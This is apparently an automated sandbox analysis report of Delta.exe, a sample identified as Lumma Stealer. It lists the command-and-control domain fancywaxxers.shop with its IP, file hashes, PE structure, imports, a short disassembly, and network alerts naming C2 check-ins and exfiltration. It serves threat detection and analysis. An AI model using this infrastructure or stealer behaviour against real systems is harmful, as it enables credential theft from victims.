                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDelta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://fancywaxxers.shop/wDelta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://support.mozilla.org/products/firefoxgro.allDelta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://fancywaxxers.shop/oft.cocDelta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgDelta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoDelta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://fancywaxxers.shop/kDelta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791271518.0000000002CA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://fancywaxxers.shop/llDelta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://fancywaxxers.shop/microsDelta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://ocsp.rootca1.amazontrust.com0:Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Delta.exe, 00000002.00000003.1728054316.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716651984.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716411891.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716550864.0000000005477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.ecosia.org/newtab/Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDelta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ac.ecosia.org/autocomplete?q=Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.microsofDelta.exe, 00000002.00000003.1716411891.00000000054C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://fancywaxxers.shop/CDelta.exe, 00000002.00000003.2328378650.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943650597.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328560798.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://fancywaxxers.shop/5Delta.exe, 00000002.00000003.1715106339.0000000002C1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://fancywaxxers.shop/api3Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesDelta.exe, 00000002.00000003.1716550864.0000000005452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://fancywaxxers.shop/Delta.exe, 00000002.00000003.1768871713.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791271518.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://fancywaxxers.shop:443/apiUserUserUserDelta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://fancywaxxers.shop/api:Delta.exe, 00000002.00000002.2943602856.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328378650.0000000002C82000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328409776.0000000002C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://www.microsoft.cocDelta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://fancywaxxers.shop/3Delta.exe, 00000002.00000003.1768871713.0000000002CA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.96.1
                                                                                        fancywaxxers.shopUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582864
                                                                                        Start date and time:2024-12-31 17:20:19 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 36s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:7
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Delta.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 50%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 19
                                                                                        • Number of non-executed functions: 43
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target Delta.exe, PID 7396 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: Delta.exe
                                                                                        TimeTypeDescription
                                                                                        11:21:14API Interceptor8x Sleep call for process: Delta.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • pelisplus.so/administrator/index.php
                                                                                        Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.mffnow.info/1a34/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        fancywaxxers.shopSMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.112.1
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.1
                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                        • 104.21.112.1
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.1
                                                                                        x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.112.1
                                                                                        Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSActive_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.52.90
                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 104.21.24.64
                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                        • 172.64.41.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 172.67.217.81
                                                                                        http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                        • 104.16.79.73
                                                                                        http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.87.65
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                        • 104.21.96.1
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        PO#5_tower_Dec162024.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                        • 104.21.96.1
                                                                                        x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.820899716469667
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:Delta.exe
                                                                                        File size:813'568 bytes
                                                                                        MD5:24a858ebb9fc24d58bb3615386ce0f43
                                                                                        SHA1:eaf287a3846ac77a908d4ec4468a49fedc207963
                                                                                        SHA256:ddd1e3c7b4d8a8670e7c6d9a3bbd7e30d1c5658ed38e41a20efdee201b5239f7
                                                                                        SHA512:492eb513fa4c6f65ec8bac9b5e08a2aa616beace8e6552469370f352b7491f4ea08b5f6c3e4dd6fdd5dda16c9b74c3d2364b71335e1780074b23f1df7a8f26e9
                                                                                        SSDEEP:12288:r3K1Pp+lMeB8BQIzbjh22SbjqPVRc5ga0VQIzbjh22SbjqPVRc5ga0J:TK1PSMZWIzbtpSfqmgaIzbtpSfqmgZ
                                                                                        TLSH:FC050251B981C072CD63253364F5DFBA462EF9200B125ADF57C80BB9DF252D28E31B6A
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x40a2e0
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:019ac8c6e24f80fb88de699b6749f599
                                                                                        Instruction
                                                                                        call 00007F11C8D975AAh
                                                                                        jmp 00007F11C8D9740Dh
                                                                                        mov ecx, dword ptr [004307C0h]
                                                                                        push esi
                                                                                        push edi
                                                                                        mov edi, BB40E64Eh
                                                                                        mov esi, FFFF0000h
                                                                                        cmp ecx, edi
                                                                                        je 00007F11C8D975A6h
                                                                                        test esi, ecx
                                                                                        jne 00007F11C8D975C8h
                                                                                        call 00007F11C8D975D1h
                                                                                        mov ecx, eax
                                                                                        cmp ecx, edi
                                                                                        jne 00007F11C8D975A9h
                                                                                        mov ecx, BB40E64Fh
                                                                                        jmp 00007F11C8D975B0h
                                                                                        test esi, ecx
                                                                                        jne 00007F11C8D975ACh
                                                                                        or eax, 00004711h
                                                                                        shl eax, 10h
                                                                                        or ecx, eax
                                                                                        mov dword ptr [004307C0h], ecx
                                                                                        not ecx
                                                                                        pop edi
                                                                                        mov dword ptr [00430800h], ecx
                                                                                        pop esi
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 14h
                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                        xorps xmm0, xmm0
                                                                                        push eax
                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                        call dword ptr [0042E8D8h]
                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                        mov dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E894h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E890h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                        push eax
                                                                                        call dword ptr [0042E920h]
                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                        xor eax, ecx
                                                                                        leave
                                                                                        ret
                                                                                        mov eax, 00004000h
                                                                                        ret
                                                                                        push 00431AB8h
                                                                                        call dword ptr [0042E8F8h]
                                                                                        ret
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        mov al, 01h
                                                                                        ret
                                                                                        push 00030000h
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6c40x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1b90.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2e8340x148.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x247da0x24800ba0610d1e4ecb6f5f64959d9eb5b455aFalse0.5549951840753424data6.559506263512015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x260000x9eb40xa00053eba87ddc7d2455b0ac2836680b1660False0.428271484375DOS executable (COM)4.9181666163124085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x300000x22800x1600112d0c9e43893ae5b7f96d23807996acFalse0.39506392045454547data4.581141173428789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x350000x1b900x1c003080b38ba0e27b64b3ab5ca0f93c1c7cFalse0.7785993303571429data6.532705218372571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        .BSS0x370000x4a2000x4a200025acdb830e33bac6903c9b1a0c9e6a9False1.0003326570404723data7.99943461927735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .BSS0x820000x4a2000x4a200025acdb830e33bac6903c9b1a0c9e6a9False1.0003326570404723data7.99943461927735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                        DLLImport
                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-31T17:21:14.445250+01002058656ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)1192.168.2.4597571.1.1.153UDP
                                                                                        2024-12-31T17:21:14.939261+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449730104.21.96.1443TCP
                                                                                        2024-12-31T17:21:14.939261+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.96.1443TCP
                                                                                        2024-12-31T17:21:15.444803+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.96.1443TCP
                                                                                        2024-12-31T17:21:15.444803+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.96.1443TCP
                                                                                        2024-12-31T17:21:15.933780+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449731104.21.96.1443TCP
                                                                                        2024-12-31T17:21:15.933780+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.96.1443TCP
                                                                                        2024-12-31T17:21:16.398944+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.96.1443TCP
                                                                                        2024-12-31T17:21:16.398944+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.96.1443TCP
                                                                                        2024-12-31T17:21:17.121915+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449732104.21.96.1443TCP
                                                                                        2024-12-31T17:21:17.121915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.96.1443TCP
                                                                                        2024-12-31T17:21:17.787374+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732104.21.96.1443TCP
                                                                                        2024-12-31T17:21:18.350782+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449733104.21.96.1443TCP
                                                                                        2024-12-31T17:21:18.350782+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.96.1443TCP
                                                                                        2024-12-31T17:21:19.635018+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449734104.21.96.1443TCP
                                                                                        2024-12-31T17:21:19.635018+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.96.1443TCP
                                                                                        2024-12-31T17:21:21.084859+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449735104.21.96.1443TCP
                                                                                        2024-12-31T17:21:21.084859+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.96.1443TCP
                                                                                        2024-12-31T17:21:22.466515+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449736104.21.96.1443TCP
                                                                                        2024-12-31T17:21:22.466515+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.96.1443TCP
                                                                                        2024-12-31T17:21:24.584267+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449737104.21.96.1443TCP
                                                                                        2024-12-31T17:21:24.584267+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.96.1443TCP
                                                                                        2024-12-31T17:21:25.028327+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.96.1443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:21:14.464581013 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:14.464634895 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:14.464699984 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:14.468256950 CET49730443192.168.2.4104.21.96.1
                                                                                        Dec 31, 2024 17:21:14.468275070 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:14.939062119 CET44349730104.21.96.1192.168.2.4
                                                                                        Dec 31, 2024 17:21:14.939260960 CET49730443192.168.2.4104.21.96.1
